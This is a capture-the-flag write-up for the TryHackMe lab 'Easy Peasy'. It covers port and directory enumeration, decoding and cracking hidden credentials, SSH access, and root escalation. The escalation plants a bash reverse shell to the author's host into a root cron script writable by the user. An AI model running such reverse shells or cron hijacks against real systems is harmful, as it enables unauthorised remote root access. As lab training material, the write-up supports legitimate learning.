Easy Peasy — TryHackMe WriteUp
Greetings, avid learners!🌟 In this article, we’re diving headfirst into the realm of TryHackMe a room called Easy Peasy, where we’ll unravel the art of locating hidden directories, leveraging powerful tools like Nmap and GoBuster. Let’s delve in! 🚀🔒
The room has instructions:- ‘Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob.’ So we just need to Deploy the machine attached to this task and use nmap to enumerate it then compromise it.
So I started with an Nmap scan
`└─$ nmap --min-rate 1000 -p- 10.10.4.113
Starting Nmap 7.94 ( [https://nmap.org](https://nmap.org/) ) at 2023-08-15 18:57 EAT
Nmap scan report for 10.10.4.113
Host is up (0.29s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
6498/tcp open unknown
65524/tcp open unknown`
`Nmap done: 1 IP address (1 host up) scanned in 83.52 seconds`We find 3 open ports. I then run service scan for the ports services.
`└─$ nmap -p80,6498,65524 -sCV -A 10.10.4.113
Starting Nmap 7.94 ( [https://nmap.org](https://nmap.org/) ) at 2023-08-15 19:02 EAT
Nmap scan report for 10.10.4.113
Host is up (0.30s latency).`
`PORT STATE SERVICE VERSION
80/tcp open http nginx 1.16.1
|*http-server-header: nginx/1.16.1
|http-title: Welcome to nginx!
| http-robots.txt: 1 disallowed entry
|/
6498/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 30:4a:2b:22:ac:d9:56:09:f2:da:12:20:57:f4:6c:d4 (RSA)
| 256 bf:86:c9:c7:b7:ef:8c:8b:b9:94:ae:01:88:c0:85:4d (ECDSA)
|* 256 a1:72:ef:6c:81:29:13:ef:5a:6c:24:03:4c:fe:3d:0b (ED25519)
65524/tcp open http Apache httpd 2.4.43 ((Ubuntu))
|*http-server-header: Apache/2.4.43 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|*/
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel`
`Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.73 seconds`We start enumerating the ports. Starting with web port 80. We find nothing on viewing robots.txt, we get
I then ran gobuster to check for directories. I found a directory /hidden
└─$ gobuster dir -u http://10.10.4.113/ --wordlist=/usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.4.113/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/08/15 19:08:34 Starting gobuster in directory enumeration mode
===============================================================
/hidden (Status: 301) [Size: 169] [--> http://10.10.4.113/hidden/]
/robots.txt (Status: 200) [Size: 43]
Progress: 20467 / 20470 (99.99%)
===============================================================
2023/08/15 19:19:05 Finished
===============================================================Accessing the directory. I find an image.
I kept enumerating by viewing page source but nothing to work with. I further ran another dir search using Gobuster we find /hidden/whatever/
└─$ gobuster dir -u http://10.10.4.113/hidden --wordlist=/usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.4.113/hidden
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/08/15 19:30:14 Starting gobuster in directory enumeration mode
===============================================================
/whatever (Status: 301) [Size: 169] [--> http://10.10.4.113/hidden/whatever/]
Progress: 20469 / 20470 (100.00%)
===============================================================
2023/08/15 19:41:48 Finished
===============================================================On accessing it. We find another image
On viewing it’s page source. We find something interesting looking like base64.
So we decrypt. Then I get my first flag flag{&&&}
We enumerate the machine further by checking the other open ports. We check port 65524 which also has Apache running
On checking /robots.txt we find a hash
On viewing the type of cipher, it is md5. So on cracking it we get flag{*$*$*$}
On checking the Page source code, there are flags in plain text
Fl4g 3 : flag{*@*@*@@**3fc64cd312}
On top of the view page source there is line with hidden>its encoded with ba……ObsJmP173N2%$%$%#%$%$
The hash is Base62, on decoding we get a directory /^%$&1ng^%&$m4^$3r
We access the directory
So I download the image to my machine and check it’s information using Steghide but it requires a passphrase
└─$ steghide info binarycodepixabay.jpg
"binarycodepixabay.jpg":
format: jpeg
capacity: 4.6 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!I use Stegcracker to get the file password
└─$ stegcracker binarycodepixabay.jpg easypeasy.txt
StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2023 - Luke Paris (Paradoxis)
StegCracker has been retired following the release of StegSeek, which
will blast through the rockyou.txt wordlist within 1.9 second as opposed
to StegCracker which takes ~5 hours.
StegSeek can be found at: https://github.com/RickdeJager/stegseek
Counting lines in wordlist..
Attacking file 'binarycodepixabay.jpg' with wordlist 'easypeasy.txt'..
Successfully cracked file with password: (&$^%$&*#*#($)
Tried 3585 passwords
Your file has been written to: binarycodepixabay.jpg.outI use steghide to to extract the contents of the image
└─$ steghide --extract -sf binarycodepixabay.jpg
Enter passphrase:
wrote extracted data to "secrettext.txt".We get a file ‘secrettext.txt’. On viewing it we get
└─$ cat secrettext.txt
username:boring
password:
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001So we use dcode.fr/en to get the hash type and decrypt it
We get password(redacted)
So we have a username:boring from the secrettext.txt and a password. For the machine ssh is running in port 6498 not the default port 22.
We login in to the machine using the provided details
└─$ ssh boring@10.10.4.113 -p6498
The authenticity of host '[10.10.4.113]:6498 ([10.10.4.113]:6498)' can't be established.
ED25519 key fingerprint is SHA256:6XHUSqR7Smm/Z9qPOQEMkXuhmxFm+McHTLbLqKoNL/Q.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.4.113]:6498' (ED25519) to the list of known hosts.
*************************************************************************
** This connection are monitored by government offical **
** Please disconnect if you are not authorized **
** A lawsuit will be filed against you if the law is not followed **
*************************************************************************
boring@10.10.4.113's password:
You Have 1 Minute Before AC-130 Starts Firing
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
!!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!!
You Have 1 Minute Before AC-130 Starts Firing
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
!!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!!Looking around we get user.txt. We view its contents.
boring@kral4-PC:~$ ls
user.txt
boring@kral4-PC:~$ cat user.txt
User Flag But It Seems Wrong Like It`s Rotated Or Something
synt{redacted}
boring@kral4-PC:~$There is a message on the User Flag. It seems the encrypted. There is a hinted mentioning Rotated.
On viewing what type of cipher it is…. We find it is a ROT Cipher. On decrypting we get our user flag flag{redacted}
We now look around to find ways to escalate privileges to root. I try running sudo command to see what we can run but it is unsuccessful
boring@kral4-PC:~$ sudo -l
[sudo] password for boring:
Sorry, user boring may not run sudo on kral4-PC.I check the crontab file as hinted from the room description
boring@kral4-PC:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root cd /var/www/ && sudo bash .mysecretcronjob.shWe find a bash file running from /var/www directory as sudo. We go to that dir
boring@kral4-PC:~$ cd /var/www/
boring@kral4-PC:/var/www$ ls -lah
total 16K
drwxr-xr-x 3 root root 4.0K Jun 15 2020 .
drwxr-xr-x 14 root root 4.0K Jun 13 2020 ..
drwxr-xr-x 4 root root 4.0K Jun 15 2020 html
-rwxr-xr-x 1 boring boring 33 Jun 14 2020 .mysecretcronjob.shI used Reverse Shell Cheat Sheet from Pentest Monkey
I edit the bash file byt adding the reverse shell
#!/bin/bash
# i will run as root
bash -i >& /dev/tcp/10.8.35.209/4444 0>&1I then run the listener in my local machine.
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.8.35.209] from (UNKNOWN) [10.10.4.113] 46334
bash: cannot set terminal process group (1803): Inappropriate ioctl for device
bash: no job control in this shell
root@kral4-PC:/var/www# It connects as root immediately. I then go to my root dir to get the flag which is flag{redacted}
root@kral4-PC:/var/www# ls
ls
html
root@kral4-PC:/var/www# cd ~
cd ~
root@kral4-PC:~# ls
ls
root@kral4-PC:~# ls -al
ls -al
total 40
drwx------ 5 root root 4096 Jun 15 2020 .
drwxr-xr-x 23 root root 4096 Jun 15 2020 ..
-rw------- 1 root root 2 Aug 15 10:49 .bash_history
-rw-r--r-- 1 root root 3136 Jun 15 2020 .bashrc
drwx------ 2 root root 4096 Jun 13 2020 .cache
drwx------ 3 root root 4096 Jun 13 2020 .gnupg
drwxr-xr-x 3 root root 4096 Jun 13 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 39 Jun 15 2020 .root.txt
-rw-r--r-- 1 root root 66 Jun 14 2020 .selected_editor
root@kral4-PC:~# cat .root.txt
cat .root.txt
flag{redacted}About the author
Wilklins Nyatteng is a cyber security enthusiast with interest in penetration testing & vulnerability assessments, OSINT, cloud security. Certified Cyber Security professional by Trend Micro, 9x Microsoft Certified, CEH Master and AWS Solutions Architect — Associate.
Follow me on:
